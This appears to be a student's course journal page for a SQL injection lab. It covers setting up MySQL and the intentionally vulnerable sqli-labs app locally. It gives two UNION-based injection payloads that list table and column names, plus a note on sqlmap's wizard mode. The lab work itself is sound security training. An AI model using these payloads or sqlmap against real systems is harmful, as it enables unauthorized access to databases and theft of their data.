Lab 9.1 SQLi Review - JimKnee-Champ/Ethical-Hacking-Journal GitHub Wiki

sudo systemctl enable mysqld sudo systemctl restart mysqld sudo mysql_secure_installation

Switch to unix_socket authentication [Y/n] n Change the root password? [Y/n] Y Remove anonymous users? [Y/n] y Disallow root login remotely? [Y/n] y Remove test database and access to it? [Y/n] y Reload privilege tables now? [Y/n] y

mkdir -p ~/sec335/week9 cd ~/sec335/week9 git clone https://github.com/skyblueee/sqli-labs-php7.git cd sqli-labs-php7

nano sql-connections/db-creds.inc

php -S 127.0.0.1:8090 -t . - this worked when i ran it within the "sqli-labs-php7" directory. Runs the Sql server so you can access it via a browser.

cd Less-1

nano index.php

Add the line "printf("
raw_sql: %s",$sql);" beneath the $sql section that mentions select star from users where id equals dollar id limit 0,1, directly underneath the $row line.

To get the SQL server to have the proper databases for testing, youll need to click the "setup/reset databases for labs" link on the main page.

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() --+

sqlmap --wizard - launches sqlmap with command line prompts for options from the user. Need to specify url, difficulty, and verbosity.